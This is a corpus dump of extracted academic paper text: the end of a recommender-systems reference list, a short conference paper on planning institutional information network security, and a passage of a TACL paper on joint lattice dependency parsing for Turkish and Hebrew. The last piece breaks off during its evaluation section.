serendipitous recommendation. In: Industrial conference on data mining. Berlin, Heidelberg: Springer, 216–230 DOI 10.1007/978-3-319-20910-4_16. Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 19/19 https://peerj.com http://dx.doi.org/10.1145/1557019.1557093 http://dx.doi.org/10.1145/2623330.2623732 http://dx.doi.org/10.1145/2441776.2441933 http://dx.doi.org/10.1007/978-0-387-85820-3_8 http://arXiv.org/abs/1703.06587 http://dx.doi.org/10.1007/s10115-007-0094-2 http://dx.doi.org/10.1145/2043932.2043955 http://dx.doi.org/10.1007/s11192-017-2388-9 http://dx.doi.org/10.1109/TETC.2014.2356505 http://dx.doi.org/10.1145/1454008.1454030 http://dx.doi.org/10.1145/2124295.2124300 http://dx.doi.org/10.1007/978-3-319-20910-4_16 http://dx.doi.org/10.7717/peerj-cs.178 work_tsqcfpvhajcedozkby6jtihnzu ---- The Establishment and Implementation of Information Network Security Plan Wang Yuanyuan Ideological and Political Department Xi’an Peihua University Xi’an, 710125, China e-mail: 64789178@qq.com Abstract—This paper explains the idea of information security and discusses the establishment of the security system of information network. By using the information system security engineering method, we will establish and improve the network security plan and disaster recovery plan through strict organization and management, adequate financial support, strong talent support and deep technical guarantee. This paper puts forward the overall strategic goal of the "people-oriented, to prevent the main" network security and the overall plan to solve the network security problems. Keywords-Information Security; Network Security; Network Security Plan Information is the main trend of development in contemporary society. The rapid development of information has a great impact on all aspects of the state and society. The information network is the nervous system of the information society. As the main infrastructure of information communication, the security problem has become a new security research hotspot. At present, the threat control of network security has been extended from the technical level to the management level to a great extent. I. AN OVERVIEW OF INFORMATION NETWORK SECURITY A. The Concept of Information Network Security and The Idea of Information Security Information network security is a security protection to prevent accidents and malicious attacks from the confidentiality, integrity, availability, controllability and non-repudiation of information itself and information system (network structure, application services, etc.). Information network security is based on the physical layer and operation level of information network system, as well as the protection of information itself (data layer) and the level of attack (content level). The definition of the definition of network security at the technical level has been relatively complete. But the security of information network is a multi-dimensional, multi factor and multi-objective system. The establishment of a security system cannot rely solely on a single security mechanism and a variety of security services. Access to the security of the entire information network system depends on the combination of multiple security mechanisms and a variety of security services. The concept of information security, which was produced in 1990s, is the result of this idea. The security system of information security is to ensure the security of information system through the combination of level and depth protection, active and passive defense. The basic components are shown in Figure 1. Figure 1. Information security system components In the system of "human centered", the information security system not only attaches importance to the adoption 2nd International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) Copyright © 2018, the Authors. Published by Atlantis Press. This is an open access article under the CC BY-NC license (http://creativecommons.org/licenses/by-nc/4.0/). Advances in Computer Science Research, volume 79 216 of safety protection technology to protect information, but also emphasizes "preventive measures". Active defense strategy is adopted to improve the ability of intrusion detection, vulnerability scanning, virus prevention, evaluation and audit, and the ability of rapid response and recovery after attack. B. The Necessity of the Research on the Security of Information Network and the Establishment of the Security System The development of information network technology has accelerated the process of social information. The development of information has opened up a broad space for the application of the information network system. However, because of the irrational decision making for the development of technology for many years, the dependence of the state and the society and the public on the information network has gradually increased. Information network is realizing information exchange and sharing. While greatly facilitating and enriching social life, network security has become an important factor affecting national security and social stability due to the vulnerability of network itself and human attacks and destruction. Therefore, the current government of the world has taken information security as the focus of government work. Many laws and regulations related to information security have been issued. The international organization for standardization has also developed a large number of safety standards. The information security system in China is also under construction. According to the goal of information security system in China, the design and implementation of information network security is comprehensively considered from the perspective of personnel, technology, management, legislation and operation. We have put forward the international safety standards and national security law as a guide, the use of information system security engineering method, through rigorous management, adequate funding, strong talent support, strong technical guarantee, establish and improve the network security plan and disaster recovery plan. Based on the principle of "people first", we should achieve the goal of achieving all levels of safety assurance from border security to host safety, and strive to reduce the security threat to an acceptable level and effectively control risks. In the event of an invasion and other disasters, a full range of security strategic objectives with powerful recovery and counterattack capabilities are achieved. II. NETWORK SECURITY PLAN A. Objectives of the Security Plan According to the relevant national laws and regulations, as well as the strategic objectives of the information network security system, the network security plan is formulated. The aim is to strengthen the security of network security and establish a relatively safe information network environment. Through the effective implementation of the plan, the following four major goals are achieved: 1) Establish a solid technical basis. We should educate and train technical groups with strong network security capabilities, establish relevant organizations, identify and improve the responsibilities of security personnel, and defend, detect, respond and recover against possible infringed networks. 2) Detection and response. Detection and monitoring of network status should be timely. When an attack is found, it can react quickly and control the attack, and quickly restore or rebuild the normal running state of the network. 3) Defense and recovery. Establish an efficient network defense system. The protection of key infrastructure is free from network invasion and virus invasion. Reduce network vulnerability. It has strong defense and recovery capabilities for network attacks that have occurred and may occur. 4) The necessary ability to counterattack. The existing security defense capability may not be enough to achieve the desired security target for the aggressive attack. It is necessary to have the ability to fight back, to prevent or even destroy the invaders' attempt. B. The Main Contents of the Network Security Plan The security of information network issystem engineering. It not only needs solid technical support, but also is restricted by many factors, such as staffing, organization construction, management level, national legislation and so on. Therefore, it is necessary to formulate Advances in Computer Science Research, volume 79 217 a feasible and efficient network security plan according to the objective of the all-round network security strategy. We should reasonably allocate all kinds of resources and coordinate the relations in all aspects. The plan mainly includes eight points: 1) To establish an active defense system. Identify key infrastructure and interdependence. The software and hardware of the network system, which is the carrier of information dissemination, storage and processing in the vulnerability information network system, is an important infrastructure in the whole system. The interdependence between these facilities, especially the key infrastructure, is given full attention. It also conducts continuous vulnerability assessment and audit of the software and hardware systems used in the network. The ability of the invaders to destroy the critical infrastructure is estimated. Develop a practical scheme to repair the vulnerability of the system and constantly modify and update the scheme. The evaluation and audit work will effectively destroy the invaders' attempt, which is bound to be the target of the invaders to carry out the attack. Therefore, enough attention should be given to the safety of the assessment and audit work itself. 2) Detection of attacks and illegal intrusion, and pay attention to the collection of network security information. Acknowledgement and correction of vulnerability can delay but not completely prevent malicious intrusion to the information network system. Therefore, we need to carry out active defense at all levels of information network system, install and configure intrusion detection system, vulnerability scanning system, emergency response system and so on. The network management department should always pay attention to the collection of network security information, help the end users to resist attacks and prevent virus invasion. Establish security management organization according to the network operation situation. a) Safety management group. The Group monitors and manages the entire network system and coordinates the work of the group and other groups. When attacked, the system is resumed with the other groups. b) Emergency response team. Responsible for security technology research and development, providing expert help to other groups to help them isolate, control, and resolve intrusion and attacks. In the case of attack, it is able to respond quickly and provide solutions. c) Intrusion detection team. It is responsible for uninterrupted network security detection, and to collect security information legally, and provide security information for other groups at any time. The system backup work is done in collaboration with the operation Department to support the recovery work after the attack. 3) Improve fast response and resilience Response and recovery plans are formulated in each key infrastructure and key information of each category in the system. In the case of attack, it can be controlled in time, at least to ensure the minimum operation of the network, so that the work of other departments is less affected. When an attack occurs, the response is as follows: a) The rapid control of the intruders and blocking the access to the system. b) Other more stringent defense measures are quickly launched. c) Close the non-critical operating system. d) To enable the redundant takeover system in an emergency, and so on. After blocking the invasion, it is necessary to quickly restore or rebuild the system that is attacked or infected, and should have the corresponding recovery capability for different attacks. a) Physical recovery, set up spare equipment, and dredge the network as soon as possible. b) The soft and hardware loopholes in the repair system. c) Repair or replace damaged soft and hardware resources. d) Recover the damaged data from the backup database as soon as possible. e) When the time and technical conditions are allowed, the intrusion information is analyzed and the source of invasion is traced. If necessary, information is provided to the public security organs. Advances in Computer Science Research, volume 79 218 4) Prioritization of key facilities and information, and level management. Prioritize key facilities and information. The more sensitive information and the facilities that have a great impact on the operation, the more valuable it is. At the same time, they are more likely to encounter risks. Therefore, we need to take more secure measures for facilities and information with high priority, so that intruders can't encroach on critical facilities and obtain confidential information in a general way. Even if you get it, you can't parse the actual meaning of the information. 5) Pay attention to the collection and exchange of information, consistent with national law In order to ensure the security of the network, it is necessary to establish a reliable, unimpeded and special communication channel. Establish a unified safety standard. The network management department should work closely with other departments to share security information and strengthen the research and development of security related technologies. 6) Pay attention to the training and employment of talents and strengthen the construction of institutions Invite some information security experts to carry out continuous safety training for the existing network managers, actively hire and educate other personnel to make up for the lack of safety talents. In addition, we have to establish a team of part-time security administrators. 7) Strengthen the construction of the system and improve the management level Under the guidance of national law, the current regulations and regulations are constantly revised and perfected. It provides a legal framework for the security of information network, and constantly improves the management level. 8) Strengthen the safety education for all kinds of personnel so as to make the public understand the necessity of improving the network security. Improve the public awareness of network security, enhance the threat to the information system and their understanding and understanding of their characteristics. Improve the ability of our defended invaders to attack before the disastrous events come III. CONCLUSION At present, the problem of network security has become a serious form that affects the national security and social stability. The implementation of network security plan has shown profound practical significance. In the long process of security assurance, the network security plan is just the first step, but we can be sure that the problem of network security will also receive more and more attention. REFERENCE [1] Gu Huaxiang. The legal measures and Enlightenment for the security of information security abroad [J]. Reform of administrative managemen. 2010(12):70-74. [2] Ma Minhu. Internet security law [M]. Xi'an Jiao Tong University press.2003. [3] Zhang Lei. Development of computer information network technology [J]. computer knowledge and technology. 2014 (03):482-484. [4] Wei Suming. Discussion on the computer information network security technology and security measures [J]. Electronics World. 2017 (03):20-21. Advances in Computer Science Research, volume 79 219 work_tss5noirkrebvmtjsidydmgfru ---- A Graph-based Lattice Dependency Parser for Joint Morphological Segmentation and Syntactic Analysis Wolfgang Seeker and Özlem Çetinoğlu Institut für Maschinelle Sprachverarbeitung University of Stuttgart {seeker,ozlem}@ims.uni-stuttgart.de Abstract Space-delimited words in Turkish and He- brew text can be further segmented into mean- ingful units, but syntactic and semantic con- text is necessary to predict segmentation. At the same time, predicting correct syntac- tic structures relies on correct segmentation. We present a graph-based lattice dependency parser that operates on morphological lattices to represent different segmentations and mor- phological analyses for a given input sentence. The lattice parser predicts a dependency tree over a path in the lattice and thus solves the joint task of segmentation, morphological analysis, and syntactic parsing. We conduct experiments on the Turkish and the Hebrew treebank and show that the joint model outper- forms three state-of-the-art pipeline systems on both data sets. Our work corroborates find- ings from constituency lattice parsing for He- brew and presents the first results for full lat- tice parsing on Turkish. 1 Introduction Linguistic theory has provided examples from many different languages in which grammatical informa- tion is expressed via case marking, morphological agreement, or clitics. In these languages, configura- tional information is less important than in English since the words are overtly marked for their syntac- tic relations to each other. Such morphologically rich languages pose many new challenges to today’s natural language processing technology, which has often been developed for English. One of the first challenges is the question on how to represent morphologically rich languages and what are the basic units of analysis (Tsarfaty et al., 2010). The Turkish treebank (Oflazer et al., 2003), for example, represents words as sequences of inflectional groups, semantically coherent groups of morphemes separated by derivational boundaries. The treebank for Modern Hebrew (Sima’an et al., 2001) chooses morphemes as the basic unit of rep- resentation. A space-delimited word in the treebank can consist of several morphemes that may belong to independent syntactic contexts. Both Turkish and Hebrew show high amounts of ambiguity when it comes to the correct segmentation of words into inflectional groups and morphemes, respectively. Within a sentence, however, these am- biguities can often be resolved by the syntactic and semantic context in which these words appear. A standard (dependency) parsing system de- cides segmentation, morphological analysis (includ- ing POS), and syntax one after the other in a pipeline setup. While pipelines are fast and efficient, they cannot model interaction between these different levels of analysis, however. It has therefore been argued that joint modeling of these three tasks is more suitable to the problem (Tsarfaty, 2006). In previous research, several transition-based parsers have been proposed to model POS/morphological tagging and parsing jointly (Hatori et al., 2011; Bohnet and Nivre, 2012; Bohnet et al., 2013). Such parsing systems have been further extended to also solve the segmentation problem in Chinese (Ha- tori et al., 2012; Li and Zhou, 2012; Zhang et al., 2014). Transition-based parsers are attractive since 359 Transactions of the Association for Computational Linguistics, vol. 3, pp. 359–373, 2015. Action Editor: Joakim Nivre. Submission batch: 4/2015; Published 6/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. they do not rely on global optimization and thus deal well with the increased model complexity that comes with joint modeling. Nonetheless, graph- based models have been proposed as well, e.g. by Li et al. (2011) for joint POS tagging and dependency parsing. Their parsers model the joint problem di- rectly at the cost of increased model complexity. In this paper, we present a graph-based depen- dency parser for lattice parsing that handles the in- creased complexity by applying dual decomposi- tion. The parser operates on morphological lat- tices and predicts word segmentation, morphologi- cal analysis, and dependency syntax jointly. It de- composes the problem into several subproblems and uses dual decomposition to find a common solution (Koo et al., 2010; Martins et al., 2010). The sub- problems are defined such that they can be solved ef- ficiently and agreement is found in an iterative fash- ion. Decomposing the problem thus keeps the com- plexity of the joint parser on a tractable level. We test the parser on the Turkish and the He- brew treebank. The segmentation problem in these languages can be tackled with the same approach even though their underlying linguistic motivation is quite different. In our experiments, the lattice de- pendency parser outperforms three state-of-the-art pipeline systems. Lattice parsing for Hebrew has been thoroughly investigated in constituency pars- ing (Cohen and Smith, 2007; Goldberg and Tsarfaty, 2008; Goldberg and Elhadad, 2013), demonstrating the viability of joint modeling. To the best of our knowledge, our work is the first to apply full lattice parsing to the Turkish treebank. We introduce the segmentation problem in Turk- ish and Hebrew in Section 2 and present the lattice parser in Section 3. Sections 4 and 5 describe the experiments and their results and we discuss related work in Section 6. We conclude with Section 7. 2 Word Segmentation in Turkish and Hebrew A lot of morphosyntactic information is overtly marked on words in morphologically rich languages. It is also common to express syntactic informa- tion through derivation or composition. As a con- sequence these words, orthographically written to- gether, actually have word-internal syntactic struc- tures. Moreover, word-external relations may de- pend on the word-internal structures, e.g., a word could be grammatically related to only parts of an- other word instead of the whole. For instance, in the Turkish sentence ekmek aldım, each word has two analyses. ekmek means ‘bread’ or the nominal ‘planting’ which is derived from the verb stem ek ‘plant’ with the nominalization suffix mek. aldım has the meaning ‘I bought’ which de- composes as al-dı-m ‘buy-Past-1sg’. It also means ‘I was red’, which is derived from the adjective al ‘red’, inflected for past tense, 1st person singular. Depending on the selected morphological analy- sis for each word, syntax and semantics of the sen- tence change. When the first analysis is selected for both words, the syntactic representation of the sen- tence is given in Figure 1, which corresponds to the meaning ‘I bought bread’. When the nominal ‘plant- ing’ is selected for the first word, it is a grammatical sentence albeit with an implausable meaning. When the derivational analysis of the second word is se- lected, regardless of the morphological analysis of the first word, the sentence is ungrammatical due to subject-verb agreement failure. Although all mor- phological analyses for these two words are correct in isolation, when they occur in the same syntactic context only some combinations are grammatical. ekmek aldım Noun+Nom Verb+Past+1sg OBJ I bought bread. Figure 1: Dependency representation for ekmek aldım. This small example demonstrates that the syntac- tic structure depends on the morphological disam- biguation of the words. At the same time, it shows that syntax can help pick the right morphological analysis. For a joint system to decide the morphological and syntactic representation together, all possible analyses must be available to the system. The pos- sible morphological analyses of a word can be effi- ciently represented in a lattice structure. The lattice representation of the sentence in Figure 1 is given in Figure 2, with double circles denoting word bound- 360 aries. A sentence lattice is the concatenation of its word lattices. A morphological analysis of a word is a full path from the initial state to the final state of its lattice. Labels on the transitions are the surface form and underlying morphological representation of segments.1 1 2 3 4 5 ekmek /Noun+Nom ek /Verb mek /Inf+Noun+Nom aldım/Verb+Past+1sg al /Adj dım/Verb+Past+1sg Figure 2: A morphological lattice for ekmek aldım. Lattices also capture well the segmentation of words in Hebrew. Different from Turkish, Hebrew segments can be syntactic units like determiners, prepositions, or relativizers attached to stem seg- ments. In an example given by Goldberg and Tsar- faty (2008), the word hneim ‘the pleasant/made- pleasant’ has three analyses corresponding to the lat- tice in Figure 3. 1 2 3 hneim/VB h/DT neim/VB neim/JJ Figure 3: The lattice for hneim (Goldberg and Tsarfaty, 2008). Both the Hebrew and the Turkish treebank anno- tate dependencies between units smaller than words. In the Turkish treebank, a space-delimited word is segmented into one or more segments depending on its morphological representation. The number of segments is determined by the number of deriva- tions. If it was derived n times, it is represented as n+1 segments. The derivational boundaries are part of the morphological representation. In the Turkish dependency parsing literature (Eryiğit et al., 2008; Çetinoğlu and Kuhn, 2013) these segments 1Surface forms on the transitions are given for convenience. In the Turkish treebank, only final segments have surface forms (of full words), the surface forms of non-final segments are rep- resented as underscores. are called inflectional groups (IGs). IGs consist of one or more inflectional morphemes. The head of a non-final IG is the IG to its right with a dependency relation DERIV. The head of a final IG could be any IG of another word. The Hebrew treebank defines relations between morphemes (Sima’an et al., 2001). Those mor- phemes correspond to what is usually considered a separate syntactic unit in English. In Hebrew script, word classes like prepositions and conjunctions are always written together with the following word. Contrary to Turkish, syntactic heads of both non- final and final segments can be internal or external to the same space-delimited word. For convenience, we will use token to refer to the smallest unit of processing for the remainder of the paper. It corresponds to IGs in Turkish and mor- phemes in Hebrew. A transition in a morphological lattice therefore represents one token. We will use word to refer to space-delimited words.2 In stan- dard parsing, these two terms usually coincide with a token in a sentence being separated from the sur- rounding ones by space. 3 Lattice Parsing One can think of lattice parsing as two tasks that the parser solves simultaneously: the parser needs to find a path through the lattice and it needs to find a parse tree. Importantly, the parser solves this task under the condition that the parse tree and the path agree with each other, i.e. the tokens that the parse tree spans over must form the path through the lat- tice. Decomposing the problem in this way defines the three components for the parser. Let x be an input lattice and T = {ROOT, t1, t2, . . . , tn} be the set of tokens in x. In what follows, we assume two different struc- tures, lattices and dependency trees. Dependency trees are represented as directed acyclic trees with a special root node (ROOT), whereas lattices are directed acyclic graphs with one defined start state and one defined end state (see Figures 2 and 3). For dependency trees, we will use the terms node and arc to refer to the vertices and the edges between the vertices, respectively. Tokens are represented as 2This is a technical definition of word and has no ambition to make claims about the linguistic definition of a word. 361 nodes in the dependency tree. For lattices, we use the terms state and transition to refer to the vertices and their edges in the lattice. Tokens are represented as transitions between states in the lattice. Find The Path. A token bigram in a lattice x is a pair of two transitions 〈t,t′〉, such that the target state of t in x coincides with the source state of t′ in x. A chain of overlapping bigrams that starts from the initial state and ends in the final state forms a path through the lattice. We represent the ROOT to- ken as the first transition, i.e. a single transition that leaves the initial state of the lattice. Given a lattice x, we define the index set of to- ken bigrams in the lattice to be S := {〈t,t′〉 |t,t′ ∈ T, target(x,t) = source(x,t′)}. For later, we fur- thermore define S|t := {〈k,t〉 |〈k,t〉 ∈ S, k ∈ T } to be the set of bigrams that have t at the second position. A consecutive path through the lattice is defined as an indicator vector p := 〈ps〉s∈S where ps = 1 means that bigram s is part of the path, oth- erwise ps = 0. We define P as the set of all well- formed paths, i.e. all paths that lead from the initial to the final state. We use a linear model that factors over bigrams. Given a scoring function fP that assigns scores to paths, the path with the highest score can be found by p̂ = arg max p∈P fP(p) with fP(p) = ∑ s∈S ps w ·φSEG(s) where φSEG is the feature extraction function for to- ken bigrams. The highest-scoring path through the lattice can be found with the Viterbi algorithm. We use this bigram model later also as a standalone disambiguator for morphological lattices to find the highest-scoring path in a lattice. Find The Tree. We define the index set of arcs in a dependency tree as A := {〈h,d,l〉 |h ∈ T,d ∈ T −{ROOT}, l ∈ L,h 6= d} with L being a set of dependency relations. A dependency tree is defined as an indicator vector y := 〈ya〉a∈A where ya = 1 means that arc a is in the parse, otherwise ya = 0. We define Y to be the set of all well-formed depen- dency trees. We follow Koo et al. (2010) and assume an arc- factored model (McDonald et al., 2005) to find the highest-scoring parse. Given a scoring function fT that assigns scores to parses, the problem of finding the highest scoring parse is defined as ŷ = arg max y∈Y fT(y) with fT(y) = ∑ a∈A ya w ·φARC(a) where φARC is the feature extraction function for sin- gle arcs and w is the weight vector. We use the Chu- Liu-Edmonds algorithm (CLE) to find the highest- scoring parse (Chu and Liu, 1965; Edmonds, 1967). Note that the algorithm includes all tokens of the lat- tice into the spanning tree, not just some tokens on some path. Chu-Liu-Edmonds furthermore enforces the tree properties of the output, i.e. acyclicity and exactly one head per token. Agreement Constraints. To make the path and the parse tree agree with each other, we introduce an additional dependency relation NOREL into L. We define a token that is attached to ROOT with rela- tion NOREL to be not on the path through the lattice. These arcs are not scored by the statistical model, they simply serve as a means for CLE to mark to- kens as not being part of the path by attaching them to ROOT with this relation. The parser can predict the NOREL label only on arcs attached to root. We introduce two agreement constraints to ensure that (i) all tokens not on the path are marked with NOREL and must be attached to ROOT and (ii) to- kens cannot be dependents of tokens marked with NOREL. The first constraint is implemented as an XOR (⊕) factor (Martins et al., 2011b) over token bigrams and arcs. It states that for a token t, either one of its bigrams3 or its NOREL-arc must be active. There is one such constraint for each token in the lattice. ⊕ s∈S|t ps ⊕y〈ROOT,t,NOREL〉 for all t ∈ T (1) The second constraint ensures that a token that is part of the path will not be attached to a token that 3The lattice ensures that always only one of the bigrams with the same token in second position can be part of a path. 362 is not. It thus guarantees the coherence of the de- pendency tree over the path through the lattice. It is implemented as an implication (=⇒) factor (Mar- tins et al., 2015). It states that an active NOREL arc for a token h implies an inactive arc for all arcs hav- ing h as head. There is one such constraint for each possible arc in the parse. y〈ROOT,h,NOREL〉 =⇒ ¬y〈h,d,l〉 (2) for all 〈h,d,l〉 ∈ A,h 6= ROOT, l 6= NOREL Deciding on a path through the lattice partitions the tokens into two groups: the ones on the path and the ones that are not. By means of the NOREL label, the CLE is also able to partition the tokens into two groups: the ROOT-NOREL tokens and the proper dependency tree tokens. The two agreement constraints then make sure that the two partionings agree with each other. The first constraint explicitly links the two partitionings by requiring each token to either belong to the path or to the ROOT-NOREL tokens. The second constraint ensures that the par- titioning by the CLE is consistent, i.e. tokens at- tached to ROOT with NOREL cannot mix with the other tokens in the tree structure. Before the parser outputs the parse the tokens that do not belong to the path/tree are discarded. The objective function of the lattice parser is arg max y∈Y,p∈P fT(y) + fP(p) subject to the two agreement constraints in Equa- tions (1) and (2). We use Alternating Directions Dual Decomposi- tion or AD3 (Martins et al., 2011a)4 to find the op- timal solution to this constrained optimization prob- lem. CLE can be implemented such that its worst case complexity is O(T2), while the Viterbi algo- rithm needed to find the path is of worst case com- plexity O(QT2), where Q is the number of states in the lattice. Instead of combining these two prob- lems directly, which would multiply their complex- ity, AD3 combines them additively, such that the complexity of the parser is O(k(T2 + QT2)) with k being the number of iterations that AD3 is run. 4http://www.ark.cs.cmu.edu/AD3/ Second-order Parsing. To facilitate second-order features, we use grandparent-sibling head automata as proposed in Koo et al. (2010), which we extend to include dependency relations. The head automata allow the parser to model consecutive sibling and grandparent relations. The architecture of the parser does not need to be changed at all to include the second-order factors. The head automata are simply another component. They compute solutions over the same set of arc indicator variables as the CLE and AD3 thus ensures that the output of the two algo- rithms agrees on the tree structure (Koo et al., 2010). The second-order factors dominate the complexity of the entire parser, since solving the head automata is of complexity O(T4L). Pruning. We use rule-based and heuristics-based pruning to reduce the search space of the parser. Arcs between tokens that lie on competing paths through the lattice are cut away as these tokens can never be in a syntactic relation. For the Turkish tree- bank, we introduce an additional rule based on the annotation scheme of the treebank. In the treebank, the IGs of a word form a chain with each IG having their head immediately to the right and only the last IG choosing the head freely. For the non-final IGs, we therefore restrict the head choice to all IGs that can immediately follow it in the lattice. In order to restrict the number of heads, we train a simple pairwise classifier that predicts the 10 best heads for each token. It uses the first-order features of the parser’s feature model. Feature Model. The parser extracts features for bigrams (path), arcs (first-order), consecutive sib- lings, and grandparent relations (both second order). It uses standard features like word form, lemma, POS, morphological features, head direction, and combinations thereof. Context features are more difficult in lattice pars- ing than in standard parsing as the left and right con- text of a token is not specified before parsing. We first extracted context features from all tokens that can follow or precede a token in the lattice. This led to overfitting effects as the model was learning specific lattice patterns. We therefore use latent left and right context and extract features from only one of the left/right neighbor tokens. The latent context is the left/right context token with the highest score 363 from the path features (raw bigram scores, they are not changed by AD3). The parser extracts context from one token in each direction. Distance features are also more difficult in lat- tices since the linear distance between two tokens depends on the actual path chosen by the parser. We define distance simply as the length of the shortest path between two tokens in the lattice, but this dis- tance may not coincide with the actual path. Context features and distance features show that lattice dependency parsing poses interesting new challenges to feature design. Using latent context features is one way of handling uncertain context, compare also the delayed features in Hatori et al. (2011). A thorough investigation of different op- tions is needed here. Learning. We train a discriminative linear model using passive-aggressive online learning (Crammer et al., 2003) with cost-augmented inference (Taskar et al., 2005) and parameter averaging (Freund and Schapire, 1999). We use Hamming loss over the arcs of the parse tree excluding NOREL arcs. The model trains one parameter vector that includes fea- tures from the tree and from the path. The maximum number of iterations of AD3 is set to 1000 during training and testing. The algo- rithm sometimes outputs fractional solutions. Dur- ing training, the model is updated with these frac- tional solutions, weighting the features and the loss accordingly. During testing, fractional solutions are projected to an integer solution by first running the best-path algorithm with the path posteriors output by AD3 and afterwards running CLE on the selected path weighted by the arc posteriors (Martins et al., 2009). In the experiments, fractional solutions occur in about 9% of the sentences in the Turkish develop- ment set during testing. 4 Experimental Setup 4.1 The Turkish Data The training set for Turkish is the 5,635 sentences of the METU-Sabancı Turkish Treebank (Oflazer et al., 2003). The 300 sentences of the ITU validation set (Eryiğit, 2012) are used for testing. As there is no separate development set, we split the training set into 10 parts and used 2 of them as development data. All models run on this development set are trained on the remaining 8 parts. We also report re- sults from 10-fold crossvalidation on the full train- ing set (10cv). We use the detached version of the Turkish tree- bank (Eryiğit et al., 2011) where multiword expres- sions are represented as separate tokens. The train- ing set of this version contains 49 sentences with loops. We manually corrected these sentences and use the corrected version in our experiments.5 The Turkish raw input is first passed through a morphological analyzer (Oflazer, 1994) in order to create morphological lattices as input to the parser. Gold analyses are added to the training lattices if the morphological analyzer failed to output the correct analyses. For the pipeline systems, the input lattices are disambiguated by running a morphological disam- biguator. We train our own disambiguator using the bigram model from the parser and find the best path through the lattice with the Viterbi algorithm. The disambiguator uses the same bigram features as the lattice parser. The morphological disambiguator is trained on the Turkish treebank as in Çetinoğlu (2014). 4.2 The Hebrew Data The data for Hebrew comes from the SPMRL Shared Task 2014 (Seddah et al., 2014), which is based on the treebank for Modern Hebrew (Sima’an et al., 2001). It provides lattices and predisam- biguated input files. The training and development lattices contained a number of circular structures due to self-loops in some states. We automatically re- moved the transitions causing these cycles. Input lattices for training were prepared as for Turkish by adding the gold standard paths if nec- essary. Compared to the Turkish data, the Hebrew lattices are so large that training times for the lat- tice parser became unacceptable. We therefore used our morphological disambiguator to predict the 10 best paths for each lattice. All transitions in the lat- tice that were not part of one of these 10 paths were discarded. Note that the number of actual paths in these pruned lattices is much higher than 10, since the paths converge after each word. All experiments 5The corrected version is available on the second author’s webpage. 364 with the joint model for Hebrew are conducted on the pruned lattices. As for Turkish we preprocess the input lattices for all baselines with our own mor- phological disambiguator. 4.3 Baselines We compare the lattice parser (JOINT for Turkish, JOINT10 for Hebrew) to three baselines: MATE, TURBO, and PIPELINE. The first two baseline systems are off-the-shelf dependency parsers that currently represent the state-of-the-art. Mate parser6 (Bohnet, 2009; Bohnet, 2010) is a graph-based dependency parser that uses Carreras’ decoder (Carreras, 2007) and ap- proximate search (McDonald and Pereira, 2006) to produce non-projective dependency structures. Tur- boParser7 (Martins et al., 2013) is a graph-based parser that uses a dual decomposition approach and outputs non-projective structures natively. The third baseline system runs the lattice parser on a pre- disambiguated lattice, i.e. in a pipeline setup. All three baselines are pipeline setups and use the same disambiguator to predict a path through the lat- tice. The bigram features in the disambiguator are the same as in the joint model. There is thus no dif- ference between the lattice parser and the baselines with respect to the features that are available during segmentation. As opposed to lattice parsing, base- line systems are trained on the gold standard seg- mentation (and thus gold morphological analyses) in the training data, since automatically predicted paths would not guarantee to be compatible with the gold dependency structures. The purpose of the first two baselines is to com- pare the joint parser to the current state-of-the-art. However, the feature sets are different between the joint parser and the off-the-shelf baselines. A differ- ence in performance between the joint parser and the first two baseline systems may thus simply be caused by a difference in the feature set. The third baseline eliminates this difference in the feature sets since it is the actual lattice parser that is run on a disam- biguated lattice. Because the morphological disam- biguator for the PIPELINE baseline is using the same feature set as the lattice parser (the bigram model), 6http://code.google.com/p/mate-tools 7http://www.ark.cs.cmu.edu/TurboParser/, version 2.0.1 the fact that the joint parser is trained and tested on full lattices is the only difference between these two systems. The PIPELINE baseline thus allows us to test directly the effect of joint decoding compared to a pipeline setup. 4.4 Evaluation Standard labeled and unlabeled attachment scores are not applicable when parsing with uncertain seg- mentation since the number of tokens in the output of the parser may not coincide with the number of tokens in the gold standard. Previous work therefore suggests alternative methods for evaluation, e.g. by means of precision, recall, and f-score over tokens, see e.g. Tsarfaty (2006) or Cohen and Smith (2007). The uncertainty of segmentation furthermore makes it very hard to evaluate the other levels of analysis independently of the segmentation. In or- der to decide whether the morphological analysis of a token (or its syntactic attachment) is correct, one always needs to find out first to which token in the gold standard it corresponds. By establishing this correspondence, the segmentation is already being evaluated. Evaluating syntax isolated from the other levels of analysis is therefore not possible in general. Hatori et al. (2012) count a dependency relation correct only when both the head and the dependent have the correct morphological analysis (here POS) and segmentation. Goldberg (2011, page 53) pro- poses a similar approach, but only requires surface forms to match between gold standard and predic- tion. These metrics compute precision and recall over tokens. Eryiğit et al. (2008) and Eryiğit (2012) define an accuracy (IGeval) for Turkish parsing by taking advantage of the annotation scheme in the Turkish treebank: A non-final IG in the Turkish tree- bank always has its head immediately to the right, al- ways with the same label, which makes it possible to ignore the inner dependency relations, i.e. the seg- mentation, of a dependent word. The metric there- fore only needs to check for each word whether the head of the last IG is attached to the correct IG in another word. The metric includes a back-off strat- egy in case the head word’s segmentation is wrong. A dependency arc is then counted as correct if it at- taches to an IG in the correct word and the POS tag of the head IG is the same as in the gold standard. 365 Parsing Evaluation. We follow Hatori et al. (2012) and use a strict definition of precision and recall (PREC, REC, F1) over tokens to evaluate the full task. We first align the tokens of a word in the parser output with the tokens of the correspond- ing word in the gold standard using the Needleman- Wunsch algorithm (Needleman and Wunsch, 1970), which we modify so it does not allow for mis- matches. A token in the parser output that is not in the gold standard is thus paired with a gap and vice versa. Two tokens must have the same morphologi- cal analysis in order to match.8 A true positive is defined as a pair of matching to- kens whose heads are also aligned and match. For labeled scores, the dependency relations must match as well. Precision is defined as the number of true positives over the number of tokens in the predic- tion, recall is defined as the number of true posi- tives over the number of tokens in the gold standard. F-score is the harmonic mean of precision and recall. This metric is very strict and requires all levels of analysis to be correct. In order to evaluate the syntax as independently as possible, we furthermore report IGeval for Turkish, with and without the aforemen- tioned backoff strategy (IGeval and IGeval STRICT). For Hebrew, we report on a version of precision and recall as defined above that only requires the surface forms of the tokens to match.9 This metric is almost the one proposed in Goldberg (2011). All reported evaluation metrics ignore punctuation. We do not use TedEval as defined in Tsarfaty et al. (2012) even though it has been used previ- ously to evaluate dependency parsing with uncer- tain segmentation (Seddah et al., 2013; Zhang et al., 2015). The reason is that it is not an inher- ently dependency-based framework and the con- version from constituency structures to dependency structures interferes with the metric.10 The metric 8The method does not create cross, many-to-one, or one-to- many alignments, which can be important because in very rare cases the same token occurs twice in one word. 9The metric would not 